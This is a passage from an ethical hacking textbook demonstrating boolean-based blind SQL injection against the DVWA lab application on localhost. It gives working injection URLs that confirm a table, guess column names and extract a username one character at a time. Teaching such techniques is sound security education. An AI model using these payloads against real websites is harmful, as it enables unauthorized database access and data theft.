Syntax
http://localhost/index.php?support=yes’ and (SELECT 1 from dvwa.users limit 0,1)=1--+
Guessing Columns in the Table
Now that we have found that the users table exists inside the database, the next step would be to
determine the columns in the table, for which we will use the following query:
Syntax
http://localhost/index.php?support=yes’ and (SELECT substring(concat(1,username),1,1) from
dvwa.users limit 0,1)=1--+
All you need to do now is replace the word “username” with the column you are trying to guess
from the query. Let’s see what happens when we execute this query.
360
◾
Ethical Hacking and Penetration Testing Guide
The application returns an error indicating that the column “username” does not exist in the
“users” table present in the dvwa database. Let’s now try injecting a column that is present in the
table.
Syntax
http://localhost/index.php?support=yes’ and (SELECT substring(concat(1,user),1,1) from dvwa.
users limit 0,1)=1--+
It results in a true statement. In a similar manner, we can try guessing other columns as well.
Extracting Data from Columns
Now comes the hard part: figuring out the contents in the column user. We would need to do it
one character at a time. Let’s take a look at the command:
Syntax
http://localhost/index.php?support=yes’ and (select mid(user,1,1) from dvwa.users limit 0,1)=’a’--+
This query is simply asking the database if the first character of the user is “a”.
We get a true response meaning that it’s indeed “a”. From the previous UNION-based SQL
injection demonstration, we already know that it’s
admin
; however, you can look at how time con-
suming this can be when we are enumerating one character a time. There are additional techniques
used by scanners where it compares the ascii values and asks questions to the database if the ascii
value of the character is greater or lesser than the value we are trying to guess. In this way, scanners
can perform this task a bit faster.
Web Hacking
◾
Dostları ilə paylaş: |
